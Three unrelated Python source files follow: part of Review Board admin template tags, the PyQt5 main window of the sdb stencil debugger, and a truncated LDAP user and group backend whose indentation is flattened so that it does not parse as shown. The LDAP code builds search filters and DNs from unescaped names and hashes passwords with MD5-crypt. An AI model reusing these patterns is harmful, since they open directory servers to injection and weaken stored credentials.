        error (Exception):
            The error containing text to split.

    Returns:
        list:
        A list containing:

        1. The title text (the first line of the error message).
        2. The rest of the error message, if the message spanned more than
           one line. Otherwise, the list contains only the title.
    """
    # Note: the docstring previously promised a tuple whose second element
    # could be None. str.split('\n', 1) actually yields a 1- or 2-element
    # list; the documentation now reflects the real contract that template
    # callers already rely on.
    return six.text_type(error).split('\n', 1)
@register.simple_tag()
def process_result_headers(result_headers):
    """Process a Django ChangeList's result headers to aid in rendering.

    This will provide better information for our template so that we can
    more effectively render a datagrid. Each header's ``class_attrib`` is
    rewritten in-place to carry datagrid-specific classes, and a sort icon
    name is computed for actively-sorted columns.

    Args:
        result_headers (list of dict):
            The result headers to modify.

    Returns:
        unicode:
        An empty string (this tag mutates the headers and renders nothing).
    """
    class_attrib_re = re.compile(r'\s*class="([^"]+)"')

    for header in result_headers:
        m = class_attrib_re.match(header['class_attrib'])

        if m:
            # Fixed: the previous code used m.groups(1)[0], misusing the
            # `default` argument of groups(). group(1) is the intended
            # (and here equivalent) way to fetch the captured class list.
            class_value = m.group(1)
        else:
            class_value = ''

        if class_value != 'action-checkbox-column':
            class_value = 'has-label %s' % class_value

        header['class_attrib'] = \
            mark_safe(' class="datagrid-header %s"' % class_value)

        if header['sortable'] and header['sort_priority'] > 0:
            if header['ascending']:
                sort_order = 'asc'
            else:
                sort_order = 'desc'

            if header['sort_priority'] == 1:
                sort_priority = 'primary'
            else:
                sort_priority = 'secondary'

            header['sort_icon'] = 'datagrid-icon-sort-%s-%s' % (
                sort_order, sort_priority)

    return ''
@register.simple_tag(takes_context=True)
def changelist_js_model_attrs(context):
    """Return serialized JSON attributes for the RB.Admin.ChangeListPage model.

    These will all be passed to the :js:class:`RB.Admin.ChangeListPage`
    constructor.

    Args:
        context (django.template.Context):
            The context for the page.

    Returns:
        django.utils.safestring.SafeText:
        A string containing the JSON attributes for the page model.
    """
    changelist = context['cl']

    model_data = {
        'modelName': changelist.opts.verbose_name,
        'modelNamePlural': changelist.opts.verbose_name_plural,
    }

    action_form = context.get('action_form')

    if action_form is not None:
        # Expose only the real actions (skipping the blank placeholder
        # choice, whose ID is empty).
        model_data['actions'] = [
            {
                'id': action_id,
                'label': action_label,
            }
            for action_id, action_label in action_form.fields['action'].choices
            if action_id
        ]

    return json_dumps_items(model_data)
@register.inclusion_tag('admin/submit_line.html', takes_context=True)
def change_form_submit_buttons(context):
    """Return HTML for a change form's submit buttons.

    This will compute the correct set of Save/Delete buttons, based on whether
    this is rendering for a Django admin change form (taking into account
    the object's state and user's permissions) or for any other type of form.

    Args:
        context (django.template.Context):
            The context for the page.

    Returns:
        django.utils.safestring.SafeText:
            A string containing the submit buttons.
    """
    show_save = context.get('show_save', True)
    delete_url = None

    # The presence of 'change' distinguishes a Django admin change form
    # from any other form using this template tag.
    if 'change' in context:
        change = context['change']
        is_popup = context['is_popup']
        show_delete = context.get('show_delete', True)

        if is_popup:
            # Popups only offer a plain Save; all other actions are hidden.
            show_delete = False
            show_save_as_new = False
            show_save_and_add_another = False
            show_save_and_continue = False
        else:
            save_as = context['save_as']
            opts = context['opts']
            original = context['original']

            # Note: show_delete is recomputed here, additionally requiring
            # that this is an actual change (not an add) and that the user
            # has delete permission.
            show_delete = (
                change and
                context.get('show_delete', True) and
                context['has_delete_permission'])
            show_save_as_new = (
                save_as and
                change)
            show_save_and_add_another = (
                (not save_as or context['add']) and
                context['has_add_permission'])
            show_save_and_continue = (
                context.get('show_save_and_continue', True) and
                context['has_change_permission'])

            if show_delete:
                # A change form for an existing object must have that
                # object available to build its delete URL.
                assert original is not None

                delete_url = add_preserved_filters(
                    context,
                    reverse(admin_urlname(opts, 'delete'),
                            args=[admin_urlquote(original.pk)]))
    else:
        # Non-admin form: every button is driven by explicit context flags.
        delete_url = context.get('delete_url', '#')
        show_delete = context.get('show_delete', False)
        show_save_as_new = context.get('show_save_as_new', False)
        show_save_and_add_another = context.get('show_save_and_add_another',
                                                False)
        show_save_and_continue = context.get('show_save_and_continue', False)

    return {
        'delete_url': delete_url,
        'show_delete_link': show_delete,
        'show_save': show_save,
        'show_save_and_add_another': show_save_and_add_another,
        'show_save_and_continue': show_save_and_continue,
        'show_save_as_new': show_save_as_new,
    }
@register.filter
def change_form_fieldsets(admin_form):
    """Iterate through all fieldsets in an administration change form.

    Each fieldset configuration on the form is wrapped in a
    :py:class:`~reviewboard.admin.forms.change_form.ChangeFormFieldset`.

    Args:
        admin_form (django.contrib.admin.helpers.AdminForm):
            The administration form.

    Returns:
        generator:
        A generator yielding each
        :py:class:`~reviewboard.admin.forms.change_form.ChangeFormFieldset`
        in the form.
    """
    return (
        ChangeFormFieldset(form=admin_form.form,
                           name=fieldset_name,
                           readonly_fields=admin_form.readonly_fields,
                           model_admin=admin_form.model_admin,
                           **fieldset_options)
        for fieldset_name, fieldset_options in admin_form.fieldsets
    )
@register.simple_tag(takes_context=True)
def render_change_form_fieldset(context, fieldset):
    """Render a Change Form fieldset to HTML.

    This delegates rendering to the
    :py:class:`~reviewboard.admin.forms.change_form.ChangeFormFieldset`
    itself, handing it the active template context.

    Args:
        context (django.template.Context):
            The current template context.

        fieldset (reviewboard.admin.forms.change_form.ChangeFormFieldset):
            The fieldset to render.

    Returns:
        django.utils.safestring.SafeText:
        The resulting HTML for the fieldset.
    """
    rendered_html = fieldset.render(context)

    return rendered_html
| |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
##===-----------------------------------------------------------------------------*- Python -*-===##
##
## S E R I A L B O X
##
## This file is distributed under terms of BSD license.
## See LICENSE.txt for more information.
##
##===------------------------------------------------------------------------------------------===##
from os import getcwd
from time import time
from PyQt5.QtCore import QFileSystemWatcher, QUrl, Qt
from PyQt5.QtGui import QDesktopServices
from PyQt5.QtWidgets import (QMainWindow, QDesktopWidget, QAction, QTabWidget, QMessageBox,
QFileDialog)
from sdbcore.logger import Logger
from sdbcore.serializerdata import SerializerData
from sdbcore.stencildata import StencilData
from sdbcore.stencilfieldmapper import StencilFieldMapper
from sdbcore.version import Version
from sdbgui.errorwindow import ErrorWindow
from sdbgui.globalconfig import GlobalConfig
from sdbgui.icon import Icon
from sdbgui.popupaboutwidget import PopupAboutWidget
from sdbgui.resultwindow import ResultWindow
from sdbgui.sessionmanager import SessionManager
from sdbgui.setupwindow import SetupWindow
from sdbgui.stencilwindow import StencilWindow
from sdbgui.tabstate import TabState
class MainWindow(QMainWindow):
    """Main window of sdb, the stencil debugger.

    Hosts the Setup/Stencil/Result/Error tab widget, the menu and tool
    bars, session save/load, and the file-system watcher that offers to
    reload the serializers when their directories change on disk.
    """

    # URL of the online documentation, opened by the help action.
    OnlineHelpUrl = QUrl("https://eth-cscs.github.io/serialbox2/sdb.html")

    def __init__(self):
        """Build the data models, the tabs, and the menu/tool bars."""
        super().__init__()
        Logger.info("Setup main window")

        # Data models backing the GUI: one serializer/stencil pair for the
        # input data and one for the reference data.
        self.__input_serializer_data = SerializerData("Input Serializer")
        self.__input_stencil_data = StencilData(self.__input_serializer_data)

        self.__reference_serializer_data = SerializerData("Reference Serializer")
        self.__reference_stencil_data = StencilData(self.__reference_serializer_data)

        self.__stencil_field_mapper = StencilFieldMapper(self.__input_stencil_data,
                                                         self.__reference_stencil_data,
                                                         GlobalConfig()["async"])

        # Watch the serializer directories so we can offer to reload when
        # the data changes on disk (see popup_reload_box).
        self.__file_system_watcher = QFileSystemWatcher()
        self.__file_system_watcher.directoryChanged[str].connect(self.popup_reload_box)
        # NOTE(review): this timestamp is never read in this class — confirm
        # whether it is still needed.
        self.__file_system_watcher_last_modify = time()

        # Load from session?
        self.__session_manager = SessionManager()
        if GlobalConfig()["default_session"]:
            self.__session_manager.load_from_file()

        self.__session_manager.set_serializer_data(self.__input_serializer_data)
        self.__session_manager.set_serializer_data(self.__reference_serializer_data)

        # Setup GUI
        self.setWindowTitle('sdb - stencil debugger (%s)' % Version().sdb_version())
        self.resize(1200, 600)

        if GlobalConfig()["center_window"]:
            self.center()

        if GlobalConfig()["move_window"]:
            self.move(GlobalConfig()["move_window"])

        self.setWindowIcon(Icon("logo-small.png"))
        self.init_menu_tool_bar()

        # Tabs
        self.__tab_highest_valid_state = TabState.Setup

        self.__widget_tab = QTabWidget(self)

        # Setup tab
        self.__widget_tab.addTab(
            SetupWindow(self, self.__input_serializer_data, self.__reference_serializer_data),
            "Setup")

        # Stencil tab
        self.__widget_tab.addTab(
            StencilWindow(self, self.__stencil_field_mapper, self.__input_stencil_data,
                          self.__reference_stencil_data),
            "Stencil")

        # Result tab
        self.__widget_tab.addTab(
            ResultWindow(self, self.__widget_tab.widget(TabState.Stencil.value),
                         self.__stencil_field_mapper),
            "Result")

        # Error tab
        self.__widget_tab.addTab(ErrorWindow(self), "Error")

        self.__widget_tab.currentChanged.connect(self.switch_to_tab)

        # Only the Setup tab is reachable until data has been loaded.
        self.__widget_tab.setTabEnabled(TabState.Setup.value, True)
        self.__widget_tab.setTabEnabled(TabState.Stencil.value, False)
        self.__widget_tab.setTabEnabled(TabState.Result.value, False)
        self.__widget_tab.setTabEnabled(TabState.Error.value, False)

        self.__widget_tab.setTabToolTip(TabState.Setup.value,
                                        "Setup Input and Reference Serializer")
        self.__widget_tab.setTabToolTip(TabState.Stencil.value,
                                        "Set the stencil to compare and define the mapping of the fields")
        self.__widget_tab.setTabToolTip(TabState.Result.value,
                                        "View the comparison result")
        self.__widget_tab.setTabToolTip(TabState.Error.value,
                                        "Detailed error description of the current field")

        self.__tab_current_state = TabState.Setup
        self.set_tab_highest_valid_state(TabState.Setup)
        self.switch_to_tab(TabState.Setup)

        self.setCentralWidget(self.__widget_tab)

        # If the MainWindow is closed, kill all popup windows
        self.setAttribute(Qt.WA_DeleteOnClose)

        Logger.info("Starting main loop")
        self.show()

    def init_menu_tool_bar(self):
        """Create all actions and populate the menu bar and tool bar."""
        Logger.info("Setup menu toolbar")

        action_exit = QAction("Exit", self)
        action_exit.setShortcut("Ctrl+Q")
        action_exit.setStatusTip("Exit the application")
        action_exit.triggered.connect(self.close)

        action_about = QAction("&About", self)
        action_about.setStatusTip("Show the application's About box")
        action_about.triggered.connect(self.popup_about_box)

        action_save_session = QAction(Icon("filesave.png"), "&Save", self)
        action_save_session.setStatusTip("Save current session")
        action_save_session.setShortcut("Ctrl+S")
        action_save_session.triggered.connect(self.save_session)

        action_open_session = QAction(Icon("fileopen.png"), "&Open", self)
        action_open_session.setShortcut("Ctrl+O")
        action_open_session.setStatusTip("Open session")
        action_open_session.triggered.connect(self.open_session)

        action_help = QAction(Icon("help.png"), "&Online Help", self)
        action_help.setStatusTip("Online Help")
        action_help.setToolTip("Online Help")
        action_help.triggered.connect(self.go_to_online_help)

        # Navigation actions are kept as attributes so their enabled state
        # can be toggled when switching tabs.
        self.__action_continue = QAction(Icon("next_cursor.png"), "Continue", self)
        self.__action_continue.setStatusTip("Continue to next tab")
        self.__action_continue.triggered.connect(self.switch_to_next_tab)
        self.__action_continue.setEnabled(True)

        self.__action_back = QAction(Icon("prev_cursor.png"), "Back", self)
        self.__action_back.setStatusTip("Back to previous tab")
        self.__action_back.triggered.connect(self.switch_to_previous_tab)
        self.__action_back.setEnabled(False)

        self.__action_reload = QAction(Icon("step_in.png"), "Reload", self)
        self.__action_reload.setStatusTip("Reload Input and Reference Serializer")
        self.__action_reload.setShortcut("Ctrl+R")
        self.__action_reload.triggered.connect(self.reload_serializer)
        self.__action_reload.setEnabled(False)

        self.__action_try_switch_to_error_tab = QAction(Icon("visualize.png"),
                                                        "Detailed error description", self)
        self.__action_try_switch_to_error_tab.setStatusTip(
            "Detailed error description of the current field")
        self.__action_try_switch_to_error_tab.triggered.connect(self.try_switch_to_error_tab)
        self.__action_try_switch_to_error_tab.setEnabled(False)

        menubar = self.menuBar()
        menubar.setNativeMenuBar(False)
        self.statusBar()

        file_menu = menubar.addMenu('&File')
        file_menu.addAction(action_open_session)
        file_menu.addAction(action_save_session)
        file_menu.addAction(action_exit)

        edit_menu = menubar.addMenu('&Edit')
        edit_menu.addAction(self.__action_back)
        edit_menu.addAction(self.__action_continue)
        edit_menu.addAction(self.__action_reload)

        help_menu = menubar.addMenu('&Help')
        help_menu.addAction(action_about)
        help_menu.addAction(action_help)

        toolbar = self.addToolBar("Toolbar")
        toolbar.addAction(action_help)
        toolbar.addAction(action_open_session)
        toolbar.addAction(action_save_session)
        toolbar.addAction(self.__action_back)
        toolbar.addAction(self.__action_continue)
        toolbar.addAction(self.__action_reload)
        toolbar.addAction(self.__action_try_switch_to_error_tab)

    def center(self):
        """Center the window on the available desktop geometry."""
        qr = self.frameGeometry()
        cp = QDesktopWidget().availableGeometry().center()
        qr.moveCenter(cp)
        self.move(qr.topLeft())

    def closeEvent(self, event):
        """Persist the current session (if configured) on window close."""
        self.__session_manager.update_serializer_data(self.__input_serializer_data)
        self.__session_manager.update_serializer_data(self.__reference_serializer_data)
        if GlobalConfig()["default_session"]:
            self.__session_manager.store_to_file()

    # ===----------------------------------------------------------------------------------------===
    #   TabWidgets
    # ==-----------------------------------------------------------------------------------------===

    def tab_widget(self, idx):
        """Return the tab widget at `idx` (an int or a TabState)."""
        return self.__widget_tab.widget(idx if not isinstance(idx, TabState) else idx.value)

    def switch_to_tab(self, tab):
        """Switch to `tab` (an int index or a TabState), updating the
        navigation actions accordingly."""
        idx = tab.value if isinstance(tab, TabState) else tab
        if self.__tab_current_state == TabState(idx):
            return

        Logger.info("Switching to %s tab" % TabState(idx).name)
        self.__tab_current_state = TabState(idx)
        self.__widget_tab.setCurrentIndex(idx)
        self.tab_widget(idx).make_update()

        self.__action_try_switch_to_error_tab.setEnabled(TabState(idx) == TabState.Result)

        # Error tab is always disabled if not in "Error"
        self.__widget_tab.setTabEnabled(TabState.Error.value, TabState(idx) == TabState.Error)

        # First tab
        if idx == 0:
            self.__action_continue.setEnabled(True)
            self.__action_back.setEnabled(False)
        # Last tab
        elif idx == self.__widget_tab.count() - 1:
            self.__action_continue.setEnabled(False)
            self.__action_back.setEnabled(True)
        # Middle tab
        else:
            self.__action_continue.setEnabled(True)
            self.__action_back.setEnabled(True)

    def set_tab_highest_valid_state(self, state):
        """Set the state at which the data is valid i.e everything <= self.valid_tab_state is valid
        """
        self.__tab_highest_valid_state = state
        self.enable_tabs_according_to_tab_highest_valid_state()

    def enable_tabs_according_to_tab_highest_valid_state(self):
        """Enable/Disable tabs according to self.__tab_highest_valid_state
        """
        if self.__tab_highest_valid_state == TabState.Setup:
            self.__widget_tab.setTabEnabled(TabState.Setup.value, True)
            self.__widget_tab.setTabEnabled(TabState.Stencil.value, False)
            self.__widget_tab.setTabEnabled(TabState.Result.value, False)
            self.__widget_tab.setTabEnabled(TabState.Error.value, False)
            self.__action_try_switch_to_error_tab.setEnabled(False)

            # No serializers are loaded; stop watching their directories.
            watched_directories = self.__file_system_watcher.directories()
            if watched_directories:
                self.__file_system_watcher.removePaths(self.__file_system_watcher.directories())
        elif self.__tab_highest_valid_state == TabState.Stencil:
            # NOTE(review): the input path comes from __input_serializer_data
            # while the reference path goes through __reference_stencil_data's
            # serializer — confirm both resolve to the intended directories.
            self.__file_system_watcher.addPath(self.__input_serializer_data.serializer.directory)
            self.__file_system_watcher.addPath(self.__reference_stencil_data.serializer.directory)

            self.__widget_tab.setTabEnabled(TabState.Setup.value, True)
            self.__widget_tab.setTabEnabled(TabState.Stencil.value, True)
            self.__widget_tab.setTabEnabled(TabState.Result.value, False)
            self.__widget_tab.setTabEnabled(TabState.Error.value, False)
            self.__widget_tab.widget(TabState.Stencil.value).initial_field_match()
            self.__action_reload.setEnabled(True)
            self.__action_try_switch_to_error_tab.setEnabled(False)
        elif self.__tab_highest_valid_state == TabState.Result:
            self.__widget_tab.setTabEnabled(TabState.Setup.value, True)
            self.__widget_tab.setTabEnabled(TabState.Stencil.value, True)
            self.__widget_tab.setTabEnabled(TabState.Result.value, True)
            self.__widget_tab.setTabEnabled(TabState.Error.value, True)
            self.__action_try_switch_to_error_tab.setEnabled(True)
        elif self.__tab_highest_valid_state == TabState.Error:
            self.__widget_tab.setTabEnabled(TabState.Setup.value, True)
            self.__widget_tab.setTabEnabled(TabState.Stencil.value, True)
            self.__widget_tab.setTabEnabled(TabState.Result.value, True)
            self.__action_try_switch_to_error_tab.setEnabled(False)

    def switch_to_next_tab(self):
        """Advance to the next tab via the current tab's continue hook."""
        self.__widget_tab.currentWidget().make_continue()

    def switch_to_previous_tab(self):
        """Go back to the previous tab via the current tab's back hook."""
        self.__widget_tab.currentWidget().make_back()

    def try_switch_to_error_tab(self):
        """Enable the Error tab if the Result tab can provide error details."""
        if self.__widget_tab.widget(TabState.Result.value).try_switch_to_error_tab():
            self.__widget_tab.setTabEnabled(TabState.Error.value, True)

    def error_window_set_result_data(self, result_data):
        """Forward `result_data` to the Error tab."""
        self.__widget_tab.widget(TabState.Error.value).set_result_data(result_data)

    # ===----------------------------------------------------------------------------------------===
    #   PopupWidgets
    # ==-----------------------------------------------------------------------------------------===

    def popup_about_box(self):
        """Show the About popup."""
        self.__about_widget = PopupAboutWidget(self)

    def popup_error_box(self, msg):
        """Log `msg` (with HTML markup stripped) and show it in a modal
        error dialog."""
        Logger.error(
            msg.replace("<b>", "").replace("</b>", "").replace("<br />", ":").replace("<br/>", ":"))

        msg_box = QMessageBox()
        msg_box.setWindowTitle("Error")
        msg_box.setIcon(QMessageBox.Critical)
        msg_box.setText(msg)
        msg_box.setStandardButtons(QMessageBox.Ok)
        msg_box.exec_()  # Blocking

    def popup_reload_box(self, path):
        """Ask whether to reload the serializers after `path` changed."""
        # Block further directoryChanged signals while the dialog is open
        # to avoid stacking multiple popups for the same change.
        self.__file_system_watcher.blockSignals(True)

        reply = QMessageBox.question(self, "Reload serializer?",
                                     "The path \"%s\" has changed.\nDo you want to reload the serializers?" % path,
                                     QMessageBox.Yes | QMessageBox.No,
                                     QMessageBox.Yes)
        if reply == QMessageBox.Yes:
            self.reload_serializer()

        self.__file_system_watcher.blockSignals(False)

    # ===----------------------------------------------------------------------------------------===
    #   Session manager
    # ==-----------------------------------------------------------------------------------------===

    def save_session(self):
        """Prompt for a file name and save the current session to it."""
        Logger.info("Try saving current session")

        dialog = QFileDialog(self, "Save current session")
        dialog.setAcceptMode(QFileDialog.AcceptSave)
        dialog.setDefaultSuffix("json")
        dialog.setDirectory(getcwd())

        if not dialog.exec_():
            Logger.info("Abort saving current session")
            return

        filename = dialog.selectedFiles()

        self.__session_manager.update_serializer_data(self.__input_serializer_data)
        self.__session_manager.update_serializer_data(self.__reference_serializer_data)

        ret, msglist = self.__session_manager.store_to_file(filename[0])
        if not ret:
            self.popup_error_box(
                "Failed to save configuration file: %s\n%s " % (filename[0], msglist[0]))

    def open_session(self):
        """Prompt for a session file and load it."""
        Logger.info("Try opening session")
        filename = QFileDialog.getOpenFileName(self, "Open Session", getcwd(),
                                               "JSON configuration (*.json)")[0]

        # getOpenFileName() returns an empty string when the dialog is
        # canceled. (Fixed: the previous check used `is ""`, an identity
        # comparison with a literal, which is unreliable and a
        # SyntaxWarning on Python 3.8+.)
        if not filename:
            Logger.info("Abort opening session")
            return

        ret, msglist = self.__session_manager.load_from_file(filename)
        if not ret:
            self.popup_error_box(
                "Failed to load configuration file: %s\n%s " % (filename, msglist[0]))
        else:
            Logger.info("Successfully opened session")
            self.__session_manager.set_serializer_data(self.__input_serializer_data)
            self.__session_manager.set_serializer_data(self.__reference_serializer_data)
            self.switch_to_tab(TabState.Setup)

    @property
    def session_manager(self):
        # The session manager owning load/store of serializer settings.
        return self.__session_manager

    # ===----------------------------------------------------------------------------------------===
    #   Reload Serializer
    # ==-----------------------------------------------------------------------------------------===

    def reload_serializer(self):
        """Reload both serializers, falling back to the Setup tab on error."""
        Logger.info("Reloading serializers")
        try:
            self.__input_serializer_data.reload()
            self.__reference_serializer_data.reload()

            # The Error tab's data is stale after a reload; fall back to
            # the Result tab.
            if self.__widget_tab.currentIndex() == TabState.Error.value:
                self.switch_to_tab(TabState.Result)

            self.__widget_tab.currentWidget().make_update()
        except RuntimeError as e:
            self.popup_error_box(str(e))
            self.set_tab_highest_valid_state(TabState.Setup)
            self.switch_to_tab(TabState.Setup)
            self.__widget_tab.currentWidget().make_update()

    # ===----------------------------------------------------------------------------------------===
    #   Online help
    # ==-----------------------------------------------------------------------------------------===

    def go_to_online_help(self):
        """Open the online documentation in the default browser."""
        Logger.info("Opening online help")
        QDesktopServices.openUrl(MainWindow.OnlineHelpUrl)
| |
from coco.contract.backends import GroupBackend, UserBackend
from coco.contract.errors import *
import ldap
from passlib.hash import ldap_md5_crypt
# TODO: delete private group of user on user delete
class LdapBackend(GroupBackend, UserBackend):
"""
Group- and UserBackend implementation communicating with an LDAP server.
Implemented by looking at the following sources:
https://www.packtpub.com/books/content/python-ldap-applications-part-1-installing-and-configuring-python-ldap-library-and-bin
https://www.packtpub.com/books/content/python-ldap-applications-part-3-more-ldap-operations-and-ldap-url-library
The LDAP record values are mapped as follows:
- cn -> GroupBackend.FIELD_PK
- cn -> UserBackend.FIELD_PK
- gidNumber -> GroupBackend.FIELD_ID
- uidNumber -> UserBackend.FIELD_ID
All other values are ignored from external sources.
On the internal server, records are stored as seen in 'create_group' and 'create_user'.
A small refactoring should probably allow defining the primary key identifier ('cn' right now)
as a constructor argument.
"""
def __init__(self, server, base_dn, users_dn=None, groups_dn=None, readonly=False):
"""
Initialize a new LDAP backend.
:param server: The LDAP server's address.
:param base_dn: The DN to work in.
:param users_dn: The DN to use for user related operations (relative to `base_dn`).
:param groups_dn: The DN to use for group related operations (relative to `base_dn`).
:param readonly: Either the server is read-only or not.
"""
if "ldap://" not in server:
server = "ldap://" + server
self.base_dn = base_dn
self.groups_dn = groups_dn
self.readonly = readonly
self.server = server
self.users_dn = users_dn
def add_group_member(self, group, user, **kwargs):
"""
:inherit.
"""
if self.readonly:
raise ReadOnlyError
if not self.group_exists(group):
raise GroupNotFoundError
if not self.user_exists(user):
raise UserNotFoundError
if not self.is_group_member(group, user):
dn = self.get_full_group_dn(group)
mod_attrs = [
(ldap.MOD_ADD, 'memberUid', [str(user)])
]
try:
self.cnx.modify_s(str(dn), mod_attrs)
return True
except Exception as ex:
raise GroupBackendError(ex)
return False
def auth_user(self, user, password, **kwargs):
"""
:inherit.
"""
if not self.user_exists(user):
raise UserNotFoundError
try:
user_ldap = LdapBackend(self.server, self.base_dn, self.users_dn)
user_ldap.connect({
'dn': user_ldap.get_full_user_dn(user),
'password': password
})
user_ldap.disconnect()
return self.get_user(user)
except AuthenticationError as ex:
raise ex
except ldap.LDAPError as ex:
raise ConnectionError(ex)
except Exception as ex:
raise UserBackendError(ex)
def connect(self, credentials, **kwargs):
"""
:inherit.
"""
dn = credentials.get('dn')
if dn is None:
username = credentials.get('username')
else:
username = dn
try:
self.cnx = ldap.initialize(self.server)
self.cnx.bind_s(str(username), str(credentials.get('password')))
except ldap.INVALID_CREDENTIALS as ex:
raise AuthenticationError(ex)
except ldap.LDAPError as ex:
raise ConnectionError(ex)
except Exception as ex:
raise UserBackendError(ex)
def create_group(self, gid, name, **kwargs):
"""
:inherit.
"""
if self.readonly:
raise ReadOnlyError
# TODO: check if such a group already exists
record = [
('objectclass', [
'posixGroup',
'top'
]),
('cn', [str(name)]),
('gidNumber', [str(gid)])
]
dn = self.get_full_group_dn(name)
try:
self.cnx.add_s(str(dn), record)
group = {}
# TODO: add more fields
group[GroupBackend.FIELD_ID] = gid
group[GroupBackend.FIELD_PK] = name
return group
except Exception as ex:
raise GroupBackendError(ex)
def create_user(self, uid, username, password, gid, home_directory, **kwargs):
"""
:inherit.
"""
if self.readonly:
raise ReadOnlyError
# TODO: check if such a user already exists
dn = self.get_full_user_dn(username)
password = self.encrypt_password(password)
record = [
('objectclass', [
'person',
'organizationalperson',
'inetorgperson',
'posixAccount',
'top'
]),
('cn', [str(username)]),
('sn', [str(username)]),
('uid', [str(username)]),
('uidNumber', [str(uid)]),
('gidNumber', [str(gid)]), # FIXME: hmm..
('userPassword', [str(password)]),
('homeDirectory', [str(home_directory)]),
('loginShell', [str('/bin/bash')])
]
try:
self.cnx.add_s(str(dn), record)
user = {}
# TODO: add more fields
user[UserBackend.FIELD_ID] = uid
user[UserBackend.FIELD_PK] = username
return user
except Exception as ex:
raise UserBackendError(ex)
def delete_group(self, group, **kwargs):
"""
:inherit.
"""
if self.readonly:
raise ReadOnlyError
if not self.group_exists(group):
raise GroupNotFoundError
dn = self.get_full_group_dn(str(group))
try:
self.cnx.delete_s(dn)
except ldap.NO_SUCH_OBJECT as ex:
raise GroupNotFoundError(ex)
except Exception as ex:
raise GroupBackendError(ex)
def delete_user(self, user, **kwargs):
"""
:inherit.
"""
if self.readonly:
raise ReadOnlyError
if not self.user_exists(user):
raise UserNotFoundError
dn = self.get_full_user_dn(user)
try:
self.remove_user_from_all_groups(user)
self.cnx.delete_s(str(dn))
except BackendError as ex:
raise ex
except ldap.NO_SUCH_OBJECT as ex:
raise UserNotFoundError(ex)
except Exception as ex:
raise UserBackendError(ex)
def disconnect(self, **kwargs):
"""
:inherit.
"""
try:
self.cnx.unbind_s()
except ldap.LDAPError as ex:
raise ConnectionError(ex)
except Exception as ex:
raise UserBackendError(ex)
def encrypt_password(self, password):
"""
Encrypt the password before storing it in LDAP.
:param password: The password to encrypt.
"""
return ldap_md5_crypt.encrypt(password)
def get_full_dn(self, cn):
"""
TODO: write doc.
"""
return "%s,%s" % (cn, self.base_dn)
def get_full_group_dn(self, group):
"""
TODO: write doc.
"""
return self.get_full_dn("cn=%s,%s" % (group, self.groups_dn))
def get_full_user_dn(self, user):
"""
TODO: write doc.
"""
return self.get_full_dn("cn=%s,%s" % (user, self.users_dn))
def get_group(self, group, **kwargs):
"""
:inherit.
"""
if not self.group_exists(group):
raise GroupNotFoundError
base = self.get_full_dn(self.groups_dn)
scope = ldap.SCOPE_SUBTREE
s_filter = 'cn=' + group
result = None
try:
result = self.cnx.search_s(str(base), scope, filterstr=str(s_filter))
except ldap.NO_SUCH_OBJECT as ex:
raise GroupNotFoundError(ex)
except Exception as ex:
raise GroupBackendError(ex)
matches = len(result)
if matches == 0:
raise GroupNotFoundError
elif matches != 1:
raise GroupBackendError("Multiple groups found")
else:
group = result[0][1]
group[GroupBackend.FIELD_ID] = int(group.get('gidNumber')[0])
group[GroupBackend.FIELD_PK] = group.get('cn')[0]
return group
def get_group_members(self, group, **kwargs):
"""
:inherit.
"""
if not self.group_exists(group):
raise GroupNotFoundError
result = None
dn = self.get_full_group_dn(group)
try:
result = self.cnx.read_s(str(dn))
except ldap.NO_SUCH_OBJECT as ex:
raise GroupNotFoundError(ex)
except Exception as ex:
raise GroupBackendError(ex)
members = []
for user in result.get('memberUid', []):
members.append(self.get_user(user))
return members
def get_groups(self, **kwargs):
"""
:inherit.
"""
base = self.get_full_dn(self.groups_dn)
scope = ldap.SCOPE_ONELEVEL
try:
# get list of groups and remove dn, to only have dicts in the list
# lda.SCOPE_ONELEVEL == 1, search only childs of dn
groups = map(lambda x: x[1], self.cnx.search_s(str(base), scope))
for group in groups:
group[UserBackend.FIELD_ID] = int(group.get('gidNumber')[0])
group[UserBackend.FIELD_PK] = group.get('cn')[0]
return groups
except Exception as e:
raise GroupBackendError(e)
def get_user(self, user, **kwargs):
"""
:inherit.
"""
if not self.user_exists(user):
raise UserNotFoundError
base = self.get_full_dn(self.users_dn)
scope = ldap.SCOPE_SUBTREE
s_filter = 'cn=' + user
result = None
try:
result = self.cnx.search_s(str(base), scope, filterstr=str(s_filter))
except ldap.NO_SUCH_OBJECT as ex:
raise UserNotFoundError(ex)
except Exception as ex:
raise UserBackendError(ex)
matches = len(result)
if matches == 0:
raise UserNotFoundError("No matching users found.")
elif matches != 1:
raise UserBackendError("Multiple users found.")
else:
user = result[0][1]
user[UserBackend.FIELD_ID] = int(user.get('uidNumber')[0])
user[UserBackend.FIELD_PK] = user.get('cn')[0]
return user
def get_users(self, **kwargs):
"""
:inherit.
"""
base = self.get_full_dn(self.users_dn)
scope = ldap.SCOPE_ONELEVEL
try:
# get list of users and remove dn, to only have dicts in the list
# lda.SCOPE_ONELEVEL == 1, search only childs of dn
users = map(lambda x: x[1], self.cnx.search_s(str(base), scope))
for user in users:
user[UserBackend.FIELD_ID] = int(user.get('uidNumber')[0])
user[UserBackend.FIELD_PK] = user.get('cn')[0]
return users
except Exception as e:
raise UserBackendError(e)
def group_exists(self, group):
"""
:inherit.
"""
base = self.get_full_dn(self.groups_dn)
scope = ldap.SCOPE_SUBTREE
s_filter = 'cn=' + group
result = None
try:
result = self.cnx.search_s(str(base), scope, filterstr=str(s_filter))
return len(result) != 0
except ldap.NO_SUCH_OBJECT as ex:
return False
except Exception as ex:
raise GroupBackendError(ex)
def is_group_member(self, group, user, **kwargs):
"""
:inherit.
"""
if not self.group_exists(group):
raise GroupNotFoundError
if not self.user_exists(user):
raise UserNotFoundError
members = self.get_group_members(group)
return next((m for m in members if user == m.get(UserBackend.FIELD_PK)), False) is not False
def remove_group_member(self, group, user, **kwargs):
"""
:inherit.
"""
if self.readonly:
raise ReadOnlyError
if not self.group_exists(group):
raise GroupNotFoundError
if self.is_group_member(group, user):
dn = self.get_full_group_dn(group)
mod_attrs = [
(ldap.MOD_DELETE, 'memberUid', [str(user)])
]
try:
self.cnx.modify_s(str(dn), mod_attrs)
return True
except Exception as ex:
raise GroupBackendError(ex)
return False
def remove_user_from_all_groups(self, user, **kwargs):
"""
:inherit.
"""
if self.readonly:
raise ReadOnlyError
if not self.user_exists(user):
raise UserNotFoundError
for group in self.get_groups():
self.remove_group_member(group.get(GroupBackend.FIELD_PK), user)
def set_user_password(self, user, password, **kwargs):
"""
:inherit.
"""
if self.readonly:
